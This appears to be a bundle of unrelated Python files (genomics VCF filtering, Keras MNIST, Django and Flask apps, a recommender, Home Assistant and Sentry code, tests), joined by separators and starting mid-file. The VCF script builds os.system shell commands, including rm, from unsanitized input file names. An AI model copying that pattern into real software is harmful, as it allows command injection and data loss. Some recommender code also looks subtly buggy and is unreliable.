return_card = anonymous.handle_card_change(user_name='player2', origin_card=self.origin_card,
opened_deck=opened_deck)
self.assertEqual(return_card.number, 2)
self.assertEqual(return_card.color, 'red')
self.assertTrue(anonymous.player2_changed)
|
import gzip
import re
import os
import time
from sys import argv
import concurrent.futures
import math
# Keep track of when the script began
startTime = time.time()
char = '\n' + ('*' * 70) + '\n'
# Argv information
inputFile = argv[1]
pathToFiles = argv[2]
numCores = int(argv[3])
if pathToFiles.endswith("/"):
pathToFiles = pathToFiles[0:-1]
# Create a list of proband files that need to have non-variant sites removed. Create a list of parent files that need sites removed
probandDict = {}
familyDict = {}
with open(inputFile) as tsvFile:
header = tsvFile.readline()
header = header.rstrip().split("\t")
fileNameIndex = header.index("file_name")
familyIdIndex = header.index("family_id")
probandIndex = header.index("proband")
sampleIdIndex = header.index("sample_id")
for sample in tsvFile:
sample = sample.rstrip().split("\t")
if os.path.exists(f"{pathToFiles}/{sample[fileNameIndex]}"):
if sample[probandIndex] == "Yes":
probandDict[sample[familyIdIndex]] = [sample[sampleIdIndex], sample[fileNameIndex]]
if sample[familyIdIndex] not in familyDict:
familyDict[sample[familyIdIndex]] = [[sample[sampleIdIndex], sample[fileNameIndex]]]
else:
familyDict[sample[familyIdIndex]].append([sample[sampleIdIndex], sample[fileNameIndex]])
else:
if sample[familyIdIndex] not in familyDict:
familyDict[sample[familyIdIndex]] = [[sample[sampleIdIndex], sample[fileNameIndex]]]
else:
familyDict[sample[familyIdIndex]].append([sample[sampleIdIndex], sample[fileNameIndex]])
# Create new familyDict, called trioDict, to include only the files with trios
trioDict = {}
familyList = []
for key, value in familyDict.items():
if len(value) == 3:
trioDict[key] = value
familyList.append(key)
# Filter each proband file, remove non-variant sites, and build a dictionary of variant-only positions
def filterVariantOnly(familyID, probandID, fileName):
os.system(f"mkdir {pathToFiles}/{familyID}")
os.system(f"mkdir {pathToFiles}/{familyID}/{probandID}")
outputName = f"{pathToFiles}/{familyID}/{probandID}/{probandID}_parsed.vcf"
positionDict = {}
with gzip.open(f"{pathToFiles}/{fileName}", 'rt') as gVCF, gzip.open(outputName, 'wb') as parsed:
for line in gVCF:
if line.startswith('#'):
parsed.write(line.encode())
elif "END" not in line:
parsed.write(line.encode())
line = line.split("\t")
chrom = line[0]
pos = line[1]
if chrom not in positionDict:
positionDict[chrom] = {pos}
else:
positionDict[chrom].add(pos)
finalName = f"{outputName}.gz"
os.system(f"zcat {outputName} | /root/miniconda2/bin/bgzip > {finalName}")
os.system(f"rm {outputName}")
os.system(f"rm {pathToFiles}/{fileName}") # remove raw input file
return(positionDict)
#Filter each parent file for sites that occur in proband of that family
def filterParents(familyID, parentID, fileName, positionDict):
os.system(f"mkdir {pathToFiles}/{familyID}/{parentID}")
outputName = f"{pathToFiles}/{familyID}/{parentID}/{parentID}_parsed.vcf"
with gzip.open(f"{pathToFiles}/{fileName}", 'rt') as gVCF, gzip.open(outputName, 'wb') as parsed:
for line in gVCF:
if line.startswith("#"):
parsed.write(line.encode())
else:
lineList = line.split("\t")
chrom = lineList[0]
pos = lineList[1]
if pos in positionDict[chrom]:
parsed.write(line.encode())
else:
if "END" in line:
for i in range(int(pos), int(lineList[7].lstrip("END=")) + 1):
if str(i) in positionDict[chrom]:
parsed.write(line.encode())
finalName = f"{outputName}.gz"
os.system(f"zcat {outputName} | /root/miniconda2/bin/bgzip > {finalName}")
os.system(f"rm {outputName}")
os.system(f"rm {pathToFiles}/{fileName}") # remove raw input file
# Iterate through familyList and remove variant sites from proband first, while creating a position dictionary.
# Then use the position dictionary to iterate through each parent file and keep positions that are in common with proband.
def filterFiles(familyID):
for sample in trioDict[familyID]:
if sample == probandDict[familyID]:
probandID = sample[0]
fileName = sample[1]
positionDict = filterVariantOnly(familyID, probandID, fileName)
for sample in trioDict[familyID]:
if sample != probandDict[familyID]:
parentID = sample[0]
fileName = sample[1]
filterParents(familyID, parentID, fileName, positionDict)
# Use concurrent.futures to filter through multiple trios at a time using the filterFiles function
for i in range(0, len(familyList), numCores):
familyListSlice = familyList[i:(i+numCores)]
with concurrent.futures.ProcessPoolExecutor(max_workers=numCores) as executor:
executor.map(filterFiles, familyListSlice)
#Print message and how long the previous steps took
timeElapsedMinutes = round((time.time()-startTime) / 60, 2)
timeElapsedHours = round(timeElapsedMinutes / 60, 2)
print(f'{char}Done. Time elapsed: {timeElapsedMinutes} minutes ({timeElapsedHours} hours) {char}') |
# -*- coding: utf-8 -*-
from keras import models
from keras import layers
from keras.datasets import mnist
from keras.utils import to_categorical
# Build and compile the neural network
network = models.Sequential()
network.add(layers.Dense(512, activation='relu', input_shape=(28 * 28,)))
network.add(layers.Dense(10, activation='softmax'))
network.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])
network.summary()
# Prepare the image data
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
train_images = train_images.reshape((60000, 28 * 28))
train_images = train_images.astype('float32') / 255.0
test_images = test_images.reshape((10000, 28 * 28))
test_images = test_images.astype('float32') / 255.0
# Prepare the labels
train_labels = to_categorical(train_labels)
print("train_labels[0] : " , train_labels[0])
test_labels = to_categorical(test_labels)
print("test_labels[0] : " ,test_labels[0])
# Train and evaluate
network.fit(train_images, train_labels, epochs=10, batch_size=128)
test_loss, test_acc = network.evaluate(test_images, test_labels)
print('test_acc : ' , test_acc)
print('test_loss : ' , test_loss)
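# A short sketch of a single prediction with the trained network
# (argmax over the softmax output gives the predicted digit).
import numpy as np
pred = network.predict(test_images[:1])
print('predicted digit :', np.argmax(pred[0]), ', true label :', np.argmax(test_labels[0]))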
|
#!/usr/bin/env python
import os
ELASTICSEARCH_LOGSTASH_INDEX = "suricata-"
ELASTICSEARCH_LOGSTASH_ALERT_INDEX = "suricata-"
ELASTICSEARCH_VERSION = int(os.environ["ELASTICSEARCH_VERSION"]) if "ELASTICSEARCH_VERSION" in os.environ else 7
ELASTICSEARCH_KEYWORD = "keyword"
ELASTICSEARCH_LOGSTASH_TIMESTAMPING = os.environ['ELASTICSEARCH_LOGSTASH_TIMESTAMPING'] if "ELASTICSEARCH_LOGSTASH_TIMESTAMPING" in os.environ else "daily"
ELASTICSEARCH_ADDRESS = os.environ['ELASTICSEARCH_ADDRESS'] if "ELASTICSEARCH_ADDRESS" in os.environ else "elasticsearch:9200"
ALLOWED_HOSTS = os.environ['ALLOWED_HOSTS'].split(",") if "ALLOWED_HOSTS" in os.environ else ["localhost"]
SURICATA_NAME_IS_HOSTNAME = False
#SURICATA_NAME_IS_HOSTNAME = True
SURICATA_UNIX_SOCKET = os.environ['SURICATA_UNIX_SOCKET'] if "SURICATA_UNIX_SOCKET" in os.environ and os.environ["SURICATA_UNIX_SOCKET"] != "" else None
#USE_KIBANA = True
#KIBANA_URL = "http://$EXPOSE:5601"
#KIBANA_INDEX = ".kibana"
#USE_EVEBOX = True
#EVEBOX_ADDRESS = "$EXPOSE:5636"
|
# encoding: UTF-8
from __future__ import print_function
import json
from datetime import datetime, timedelta, time
from pymongo import MongoClient
from vnpy.trader.app.ctaStrategy.ctaBase import MINUTE_DB_NAME, TICK_DB_NAME
from vnpy.trader.vtUtility import get_trade_time
#----------------------------------------------------------------------
def cleanData(dbName, collectionName, start):
"""清洗数据"""
print(u'\n清洗数据库:%s, 集合:%s, 起始日:%s' %(dbName, collectionName, start))
mc = MongoClient('localhost', 27017) # 创建MongoClient
cl = mc[dbName][collectionName] # 获取数据集合
d = {'datetime':{'$gte':start}} # 只过滤从start开始的数据
    cx = list(cl.find(d))    # 获取数据并转为列表(游标只能遍历一次)
    data_time = [d['datetime'].time() for d in cx]  # 数据时间戳
#获取合约交易时间
trade_time = get_trade_time(collectionName)
# 遍历数据
for data in cx:
# 获取时间戳对象
dt = data['datetime'].time()
# 默认需要清洗
cleanRequired = True
# 如果在交易事件内,则为有效数据,无需清洗
#没有夜盘, 也没有早盘休息
if trade_time['morning_rest'] is None and trade_time['night_start'] is None:
if ((trade_time['morning_start'] <= dt <trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end'])):
cleanRequired = False
#有早盘休息, 没有夜盘
elif trade_time['morning_rest'] is not None and trade_time['night_start'] is None:
if ((trade_time['morning_start'] <= dt <trade_time['morning_rest']) or
(trade_time['morning_restart'] <= dt < trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end'])):
cleanRequired = False
#有早盘休息,有夜盘
else:
#夜盘隔天结束
if trade_time['night_end'] < time(3, 0, 0):
if ((trade_time['morning_start'] <= dt <trade_time['morning_rest']) or
(trade_time['morning_restart'] <= dt < trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end']) or
(dt >= trade_time['night_start']) or (dt <= trade_time['night_end'])):
cleanRequired = False
#夜盘当天结束
else:
if ((trade_time['morning_start'] <= dt <trade_time['morning_rest']) or
(trade_time['morning_restart'] <= dt < trade_time['morning_end']) or
(trade_time['afternoon_start'] <= dt <trade_time['afternoon_end']) or
(trade_time['night_start'] <= dt < trade_time['night_end'])):
cleanRequired = False
#如果数据时间戳重复,则需要清洗
        if data_time.count(dt) > 1:
            cleanRequired = True
            data_time.remove(dt)
print(u'存在重复数据')
# 如果需要清洗
if cleanRequired:
print(u'删除无效数据,时间戳:%s' %data['datetime'])
cl.delete_one(data)
print(u'清洗完成,数据库:%s, 集合:%s' %(dbName, collectionName))
#----------------------------------------------------------------------
def runDataCleaning():
"""运行数据清洗"""
print(u'开始数据清洗工作')
# 加载配置
setting = {}
with open("DR_setting.json") as f:
setting = json.load(f)
# 遍历执行清洗
today = datetime.now()
start = today - timedelta(10) # 清洗过去10天数据
    start = start.replace(hour=0, minute=0, second=0, microsecond=0)
for l in setting['tick']:
symbol = l[0]
cleanData(TICK_DB_NAME, symbol, start)
for l in setting['bar']:
symbol = l[0]
cleanData(MINUTE_DB_NAME, symbol, start)
print(u'数据清洗工作完成')
if __name__ == '__main__':
runDataCleaning()
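# Assumed structure of DR_setting.json (hypothetical example, inferred from the
# loops in runDataCleaning: each entry is a list whose first element is the
# contract symbol used as the MongoDB collection name):
# {
#     "tick": [["rb1905"], ["IF1906"]],
#     "bar":  [["rb1905"], ["IF1906"]]
# }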
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from django.urls import reverse
from django.utils.functional import cached_property
from django_autoslugfield.fields import AutoSlugField
from common_utils.models import TimestampModelMixin
from rich_editor.fields import RichTextOriginalField, RichTextFilteredField
NEWS_MAX_LENGTH = getattr(settings, 'NEWS_MAX_LENGTH', 3000)
class Category(models.Model):
name = models.CharField(
verbose_name="názov",
max_length=255
)
slug = models.SlugField(
verbose_name="skratka URL",
unique=True
)
description = models.TextField(
verbose_name="popis"
)
def get_absolute_url(self):
return reverse('news:list-category', kwargs={'category': self.slug, 'page': 1})
def __str__(self):
return self.name
class Meta:
verbose_name = "kategória"
verbose_name_plural = "kategórie"
class NewsManager(models.Manager):
def get_queryset(self):
return (super().get_queryset()
.select_related('author'))
class NewsListManager(models.Manager):
def get_queryset(self):
return (super().get_queryset()
.select_related('author')
.filter(approved=True)
.order_by('-pk'))
class News(TimestampModelMixin, models.Model):
all_news = NewsManager()
objects = NewsListManager()
title = models.CharField(
verbose_name="titulok",
max_length=255
)
slug = AutoSlugField(
verbose_name="skratka URL",
title_field='title',
unique=True
)
category = models.ForeignKey(
Category,
verbose_name="kategória",
on_delete=models.PROTECT
)
original_short_text = RichTextOriginalField(
verbose_name="krátky text",
filtered_field='filtered_short_text',
property_name='short_text',
parsers={'html': 'news_short'},
max_length=NEWS_MAX_LENGTH
)
filtered_short_text = RichTextFilteredField(
)
original_long_text = RichTextOriginalField(
verbose_name="dlhý text",
filtered_field='filtered_long_text',
property_name='long_text',
parsers={'html': 'news_long'},
help_text="Vyplňte v prípade, že sa text v detaile správy má líšiť od textu v zozname."
)
filtered_long_text = RichTextFilteredField(
)
author = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name="autor",
on_delete=models.SET_NULL,
blank=True,
null=True
)
authors_name = models.CharField(
verbose_name="meno autora",
max_length=255
)
source = models.CharField(
verbose_name="zdroj",
max_length=100,
blank=True
)
source_url = models.URLField(
verbose_name="URL zdroja",
max_length=1000,
blank=True
)
approved = models.BooleanField(
verbose_name="schválená",
default=False
)
comments_header = GenericRelation('comments.RootHeader')
comments = GenericRelation('comments.Comment')
attachments = GenericRelation('attachment.Attachment')
notes = GenericRelation('notes.Note')
content_fields = ('original_short_text', 'original_long_text',)
class Meta:
verbose_name = "správa"
verbose_name_plural = "správy"
def get_absolute_url(self):
return reverse('news:detail', kwargs={'slug': self.slug})
def get_list_url(self):
return reverse('news:list', kwargs={'page': 1})
@cached_property
def admin_notes(self):
return self.notes.order_by('pk')
@cached_property
def public_notes(self):
return self.admin_notes.filter(is_public=True)
def __str__(self):
return self.title
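# Usage note (sketch): News.objects (NewsListManager) returns only approved news
# ordered newest first, while News.all_news exposes every record, e.g.:
#
#   latest = News.objects.all()[:10]   # approved only, ordered by -pk
#   everything = News.all_news.all()   # includes unapproved entries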
|
# coding=utf-8
"""
UserKNN based on Collaborative Filtering Recommender
[Rating Prediction]
Literature:
Aggarwal, Charu C.:
Chapter 2: Neighborhood-Based Collaborative Filtering
Recommender Systems: The Textbook. 2016
file:///home/fortesarthur/Documentos/9783319296579-c1.pdf
"""
# © 2018. Case Recommender (MIT License)
import numpy as np
from caserec.utils.extra_functions import timed
from caserec.recommenders.rating_prediction.base_knn import BaseKNN
__author__ = 'Arthur Fortes <[email protected]>'
class UserKNN(BaseKNN):
def __init__(self, train_file=None, test_file=None, output_file=None, similarity_metric="cosine", k_neighbors=None,
as_similar_first=False, sep='\t', output_sep='\t'):
"""
UserKNN for rating prediction
This algorithm predicts ratings for each user based on the similar items that his neighbors
(similar users) consumed.
Usage::
>> UserKNN(train, test).compute()
>> UserKNN(train, test, ranking_file, as_similar_first=True, k_neighbors=60).compute()
:param train_file: File which contains the train set. This file needs to have at least 3 columns
(user item feedback_value).
:type train_file: str
:param test_file: File which contains the test set. This file needs to have at least 3 columns
(user item feedback_value).
:type test_file: str, default None
:param output_file: File with dir to write the final predictions
:type output_file: str, default None
:param similarity_metric: Pairwise metric to compute the similarity between the users. Reference about
distances: http://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.spatial.distance.pdist.html
:type similarity_metric: str, default cosine
:param k_neighbors: Number of neighbors to use. If None, k_neighbor = int(sqrt(n_users))
:type k_neighbors: int, default None
:param as_similar_first: If True, for each unknown item, which will be predicted, we first look for its k
most similar users and then take the intersection with the users that
        have seen that item.
:type as_similar_first: bool, default False
:param sep: Delimiter for input files
:type sep: str, default '\t'
:param output_sep: Delimiter for output file
:type output_sep: str, default '\t'
"""
super(UserKNN, self).__init__(train_file=train_file, test_file=test_file, output_file=output_file,
similarity_metric=similarity_metric, sep=sep, output_sep=output_sep)
self.recommender_name = 'UserKNN Algorithm'
self.as_similar_first = as_similar_first
self.k_neighbors = k_neighbors
# internal vars
self.su_matrix = None
self.users_id_viewed_item = None
def init_model(self):
"""
Method to initialize the model. Compute similarity matrix based on user (user x user)
"""
super(UserKNN, self).init_model()
self.users_id_viewed_item = {}
# Set the value for k
if self.k_neighbors is None:
self.k_neighbors = int(np.sqrt(len(self.users)))
self.su_matrix = self.compute_similarity(transpose=False)
        # Map the users who have seen each item to their respective ids
for item in self.items:
for user in self.train_set['users_viewed_item'].get(item, []):
self.users_id_viewed_item.setdefault(item, []).append(self.user_to_user_id[user])
def predict(self):
"""
Method to predict ratings for all known users in the train set.
"""
for user in self.users:
if len(self.train_set['feedback'].get(user, [])) != 0:
if self.test_file is not None:
if self.as_similar_first:
self.predictions += self.predict_similar_first_scores(user, self.test_set['items_seen_by_user']
.get(user, []))
else:
self.predictions += self.predict_scores(user, self.test_set['items_seen_by_user'].get(user, []))
else:
# Selects items that user has not interacted with.
items_seen_by_user = []
u_list = list(np.flatnonzero(self.matrix[self.user_to_user_id[user]] == 0))
for item_id in u_list:
items_seen_by_user.append(self.item_id_to_item[item_id])
if self.as_similar_first:
self.predictions += self.predict_similar_first_scores(user, items_seen_by_user)
else:
self.predictions += self.predict_scores(user, items_seen_by_user)
else:
# Implement cold start user
pass
def predict_scores(self, user, unpredicted_items):
"""
In this implementation, for each unknown item,
        which will be predicted, we first look for users that have seen that item and calculate the similarity between them
and the user. Then we sort these similarities and get the most similar k's. Finally, the score of the
unknown item will be the sum of the similarities.
rui = bui + (sum((rvi - bvi) * sim(u,v)) / sum(sim(u,v)))
:param user: User
:type user: int
:param unpredicted_items: A list of unknown items for each user
:type unpredicted_items: list
:return: Sorted list with triples user item rating
:rtype: list
"""
u_id = self.user_to_user_id[user]
predictions = []
for item in unpredicted_items:
neighbors = []
rui = 0
sim_sum = 0
for user_v_id in self.users_id_viewed_item.get(item, []):
user_v = self.user_id_to_user[user_v_id]
neighbors.append((user_v, self.su_matrix[u_id, user_v_id], self.train_set['feedback'][user_v][item]))
neighbors = sorted(neighbors, key=lambda x: -x[1])
if neighbors:
for triple in neighbors[:self.k_neighbors]:
rui += (triple[2] - self.bui[triple[0]][item]) * triple[1] if triple[1] != 0 else 0.001
sim_sum += triple[1] if triple[1] != 0 else 0.001
rui = self.bui[user][item] + (rui / sim_sum)
else:
rui = self.bui[user][item]
# normalize the ratings based on the highest and lowest value.
if rui > self.train_set["max_value"]:
rui = self.train_set["max_value"]
if rui < self.train_set["min_value"]:
rui = self.train_set["min_value"]
predictions.append((user, item, rui))
return sorted(predictions, key=lambda x: x[1])
def predict_similar_first_scores(self, user, unpredicted_items):
"""
In this implementation, for each unknown item, which will be
predicted, we first look for its k most similar users and then take the intersection with the users that
        have seen that item. Finally, the score of the unknown item will be the sum of the similarities.
rui = bui + (sum((rvi - bvi) * sim(u,v)) / sum(sim(u,v)))
:param user: User
:type user: int
:param unpredicted_items: A list of unknown items for each user
:type unpredicted_items: list
:return: Sorted list with triples user item rating
:rtype: list
"""
u_id = self.user_to_user_id[user]
predictions = []
# Select user neighbors, sorting user similarity vector. Returns a list with index of sorting values
neighbors = sorted(range(len(self.su_matrix[u_id])), key=lambda m: -self.su_matrix[u_id][m])
for item in unpredicted_items:
rui = 0
sim_sum = 0
# Intersection bt. the neighbors closest to the user and the users who accessed the unknown item.
common_users = list(set(
self.users_id_viewed_item.get(item, [])).intersection(neighbors[1:self.k_neighbors]))
if common_users:
for user_v_id in common_users:
user_v = self.user_id_to_user[user_v_id]
sim_uv = self.su_matrix[u_id, user_v_id]
rui += (self.train_set['feedback'][user_v][item] - self.bui[user_v][item]) * \
sim_uv if sim_sum != 0 else 0.001
sim_sum += sim_uv if sim_sum != 0 else 0.001
rui = self.bui[user][item] + (rui / sim_sum)
else:
rui = self.bui[user][item]
# normalize the ratings based on the highest and lowest value.
if rui > self.train_set["max_value"]:
rui = self.train_set["max_value"]
if rui < self.train_set["min_value"]:
rui = self.train_set["min_value"]
predictions.append((user, item, rui))
return sorted(predictions, key=lambda x: x[1])
def compute(self, verbose=True, metrics=None, verbose_evaluation=True, as_table=False, table_sep='\t'):
"""
Extends compute method from BaseItemRecommendation. Method to run recommender algorithm
:param verbose: Print recommender and database information
:type verbose: bool, default True
:param metrics: List of evaluation metrics
:type metrics: list, default None
:param verbose_evaluation: Print the evaluation results
:type verbose_evaluation: bool, default True
:param as_table: Print the evaluation results as table
:type as_table: bool, default False
:param table_sep: Delimiter for print results (only work with verbose=True and as_table=True)
:type table_sep: str, default '\t'
"""
super(UserKNN, self).compute(verbose=verbose)
if verbose:
self.init_model()
print("training_time:: %4f sec" % timed(self.train_baselines))
if self.extra_info_header is not None:
print(self.extra_info_header)
print("prediction_time:: %4f sec" % timed(self.predict))
else:
# Execute all in silence without prints
self.extra_info_header = None
self.init_model()
self.train_baselines()
self.predict()
self.write_predictions()
if self.test_file is not None:
self.evaluate(metrics, verbose_evaluation, as_table=as_table, table_sep=table_sep)
|
# -*- coding: utf-8 -*-
"""
Regular expression serving object.
Author:
-------
Sri Ram Sagar K
Created on Sat Jan 13 20:41:11 2018
"""
import re
class ReObjects(object):
''' Regex precompiled objects based on pattern'''
    emails = (r".*@\s*gmu\s*\.\s*edu", r".*AT\s*(gmu|GMU)\s*DOT\s*(edu|EDU)")
phones = (r"(\d{3})\s*-\s*\d{3}\s*-\s*\d{4}",)
email_patterns = [re.compile(obj) for obj in emails]
phone_patterns = [re.compile(obj) for obj in phones] |
import logging
import voluptuous as vol
from homeassistant.components.websocket_api import (
websocket_command,
result_message,
event_message,
async_register_command
)
from .const import WS_CONNECT, WS_UPDATE
from .helpers import get_devices, create_entity, get_config, is_setup_complete
_LOGGER = logging.getLogger(__name__)
async def setup_connection(hass, config):
@websocket_command({
vol.Required("type"): WS_CONNECT,
vol.Required("deviceID"): str,
})
def handle_connect(hass, connection, msg):
deviceID = msg["deviceID"]
device = get_devices(hass).get(deviceID,
BrowserModConnection(hass, deviceID))
device.connect(connection, msg["id"])
get_devices(hass)[deviceID] = device
connection.send_message(result_message(msg["id"]))
@websocket_command({
vol.Required("type"): WS_UPDATE,
vol.Required("deviceID"): str,
vol.Optional("data"): dict,
})
def handle_update(hass, connection, msg):
devices = get_devices(hass)
deviceID = msg["deviceID"]
if deviceID in devices:
devices[deviceID].update(msg.get("data", None))
async_register_command(hass, handle_connect)
async_register_command(hass, handle_update)
class BrowserModConnection:
def __init__(self, hass, deviceID):
self.hass = hass
self.deviceID = deviceID
self.connection = []
self.media_player = None
self.screen = None
self.sensor = None
self.fully = None
self.camera = None
def connect(self, connection, cid):
self.connection.append((connection, cid))
self.trigger_update()
def disconnect():
self.connection.remove((connection, cid))
connection.subscriptions[cid] = disconnect
def send(self, command, **kwargs):
if self.connection:
connection, cid = self.connection[-1]
connection.send_message(event_message(cid, {
"command": command,
**kwargs,
}))
def trigger_update(self):
if is_setup_complete(self.hass):
self.send("update", **get_config(self.hass, self.deviceID))
def update(self, data):
if data.get('browser'):
self.sensor = self.sensor or create_entity(
self.hass,
'sensor',
self.deviceID,
self)
if self.sensor:
self.sensor.data = data.get('browser')
if data.get('player'):
self.media_player = self.media_player or create_entity(
self.hass,
'media_player',
self.deviceID,
self)
if self.media_player:
self.media_player.data = data.get('player')
if data.get('screen'):
self.screen = self.screen or create_entity(
self.hass,
'light',
self.deviceID,
self)
if self.screen:
self.screen.data = data.get('screen')
if data.get('fully'):
self.fully = self.fully or create_entity(
self.hass,
'binary_sensor',
self.deviceID,
self)
if self.fully:
self.fully.data = data.get('fully')
if data.get('camera'):
self.camera = self.camera or create_entity(
self.hass,
'camera',
self.deviceID,
self)
if self.camera:
self.camera.data = data.get('camera')
|
import json
import os
from werkzeug.contrib.fixers import ProxyFix
from flask import Flask, request, redirect, url_for, abort, jsonify
from flask_cors import CORS, cross_origin
from biosimulations_dispatch.config import Config
from biosimulations_dispatch.hpc_manager import HPCManager
class PrefixMiddleware:
def __init__(self, app, prefix=''):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][len(self.prefix):]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
            start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ["This url does not belong to the app.".encode()]
app = Flask(__name__)
cors = CORS(app)
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix='')
app.wsgi_app = ProxyFix(app.wsgi_app)
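# Illustrative request body for POST /dispatch (field names mirror the keys read
# below; the exact simSpec layout is an assumption defined by HPCManager.dispatch_job):
# {
#   "simSpec": {"simulator": "copasi", "...": "..."},
#   "sedml": "<sedML ...>",
#   "sedmlName": "model.sedml",
#   "sbml": "<sbml ...>"
# }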
@app.route('/dispatch', methods=['POST'])
@cross_origin()
def dispatch_to_hpc():
if request.method == 'POST' and request.remote_addr in Config.ALLOWED_ORIGINS:
try:
hpc_manager = HPCManager(username=Config.HPC_USER, password=Config.HPC_PASS, server=Config.HPC_HOST, sftp_server=Config.HPC_SFTP_HOST)
data = request.get_json()
result = hpc_manager.dispatch_job(
# TODO: parse simulator from sim spec within dispatch_job
simulator = data['simSpec']['simulator'],
value_dict = data['simSpec'],
sedml = data['sedml'],
sedml_name = data['sedmlName'],
sbml = data['sbml'],
temp_dir = Config.TEMP_DIR
)
if result:
return jsonify({"message": result}), 200
else:
return jsonify({'message': 'Job submission failed'}), 400
        except Exception as ex:
            return jsonify({'message': "Error occurred: " + str(ex)}), 400
elif request.remote_addr not in Config.ALLOWED_ORIGINS:
return jsonify({'message': 'Requester origin \'{}\' is not allowed'.format(request.remote_addr)}), 400
else:
return jsonify({'message': 'Bad request'}), 400 |
#!/usr/bin/env python3
import argparse
import yaml
from libgather import Gather
def parse_arguments():
parser = argparse.ArgumentParser(description="MiniConf Portal Command Line")
parser.add_argument("email", help="email address of user")
return parser.parse_args()
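# Usage sketch (script filename assumed): python remove_email.py someone@example.com
# Expects a config.yml next to the script providing gather_api_key and gather_space_id.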
if __name__ == "__main__":
config = yaml.load(open("config.yml").read(), Loader=yaml.SafeLoader)
args = parse_arguments()
gather = Gather(config["gather_api_key"], config["gather_space_id"])
    email_dict = gather.getGatherEmailDictionary()
    del email_dict[args.email]
    gather.setGatherEmailDictionary(
        email_dict,
True # Must overwrite here... This is racy with other updates!
)
|
from __future__ import absolute_import, print_function
from django.core.urlresolvers import reverse
from sentry.auth.view import AuthView, ConfigureView
from sentry.utils.http import absolute_uri
from sentry_auth_saml2.forms import (
AttributeMappingForm, SAMLForm, URLMetadataForm, XMLMetadataForm,
process_metadata,
)
class SAML2ConfigureView(ConfigureView):
def dispatch(self, request, organization, provider):
sp_metadata_url = absolute_uri(reverse('sentry-auth-organization-saml-metadata', args=[organization.slug]))
if request.method != 'POST':
saml_form = SAMLForm(provider.config['idp'])
attr_mapping_form = AttributeMappingForm(provider.config['attribute_mapping'])
else:
saml_form = SAMLForm(request.POST)
attr_mapping_form = AttributeMappingForm(request.POST)
if saml_form.is_valid() and attr_mapping_form.is_valid():
provider.config['idp'] = saml_form.cleaned_data
                provider.config['attribute_mapping'] = attr_mapping_form.cleaned_data
provider.save()
return self.render('sentry_auth_saml2/configure.html', {
'sp_metadata_url': sp_metadata_url,
'forms': {'saml': saml_form, 'attrs': attr_mapping_form},
})
class SelectIdP(AuthView):
def handle(self, request, helper):
op = 'url'
forms = {
'url': URLMetadataForm(),
'xml': XMLMetadataForm(),
'idp': SAMLForm(),
}
if 'action_save' in request.POST:
op = request.POST['action_save']
form_cls = forms[op].__class__
forms[op] = process_metadata(form_cls, request, helper)
# process_metadata will return None when the action was successful and
# data was bound to the helper.
if not forms[op]:
return helper.next_step()
return self.respond('sentry_auth_saml2/select-idp.html', {
'op': op,
'forms': forms,
})
class MapAttributes(AuthView):
def handle(self, request, helper):
if 'save_mappings' not in request.POST:
form = AttributeMappingForm()
else:
form = AttributeMappingForm(request.POST)
if form.is_valid():
helper.bind_state('attribute_mapping', form.cleaned_data)
return helper.next_step()
return self.respond('sentry_auth_saml2/map-attributes.html', {
'form': form,
})
|
# -*- coding: utf-8 -*-
"""
*******************************************************************************
Tests of the quantarhei.qm.hilbertspace.statevector package
*******************************************************************************
"""
import unittest
from quantarhei import StateVector
class TestStateVector(unittest.TestCase):
"""Tests for the statevector package
"""
def test_of_state_vector_creation(self):
"""Testing StateVector creation """
psi = StateVector(3)
self.assertEqual(psi.dim,3)
psi = StateVector()
self.assertFalse(psi._initialized)
def test_of_sv_creation_from_data(self):
"""Testing StateVector creation with data"""
import numpy
        vec = numpy.zeros((1,3), dtype=float)
with self.assertRaises(Exception):
psi = StateVector(data=vec)
        vec = numpy.zeros(3, dtype=float)
psi = StateVector(data=vec)
self.assertEqual(psi.dim,3)
def test_creation_from_list(self):
"""Tests creation from non numpy array """
import numpy
vec = [0.1, 2.0, 0.0]
psi = StateVector(data = vec)
self.assertAlmostEqual(psi.norm(), numpy.sqrt(0.1**2 + 4.0))
self.assertAlmostEqual(psi.dot(psi), psi.norm()**2)
def test_of_scalar_product(self):
"""Test StateVector scalar product """
import numpy
        vec1 = numpy.zeros(3, dtype=float)
        vec2 = numpy.zeros(3, dtype=float)
vec1[1] = 1.0
vec2[0] = 1.0
psi1 = StateVector(data=vec1)
psi2 = StateVector(data=vec2)
psi3 = StateVector(3)
psi3.data[1] = 0.5
scl12 = psi1.dot(psi2)
self.assertEqual(scl12, 0.0)
scl13 = psi3.dot(psi1)
self.assertEqual(scl13, 0.5)
self.assertEqual(psi1.dot(psi1), 1.0)
def test_norm(self):
"""Test StateVector norm
"""
import numpy
        vec = numpy.zeros(5, dtype=float)
vec[1] = 2.0
vec[4] = 3.0
psi = StateVector(data=vec)
self.assertAlmostEqual(psi.norm(), numpy.sqrt(13.0))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from glob import glob
import json
my_dir = os.path.abspath(os.path.dirname(__file__))
# subdir = 'api_programRatings'
# subdir = 'api_commercialRatings'
subdir = sys.argv[1]
print("Searching directory: ", subdir)
outdir = subdir + '_json'
if not os.path.exists(outdir):
os.makedirs(outdir)
lst_api_raw = glob(os.path.join(my_dir, subdir, '*.json'))
for json_file in lst_api_raw:
base_name = os.path.basename(json_file)
write_path = os.path.join(outdir, base_name)
# write_path = write_path.replace('%2B3','_')
write_path = write_path.replace('%','_')
# print(write_path)
# break
with open(json_file,'r+') as fp:
text = fp.read()
pos = text.find("[")
pos2 = max([pos for pos, char in enumerate(text) if char == "]"])
# print(pos,pos2)
# text = text[pos+1:pos2] # remove []
text = text[pos:pos2+1] # keep []
text = text.replace("\\",'')
# print(text)
with open(write_path,'w+') as fo:
fo.write(text)
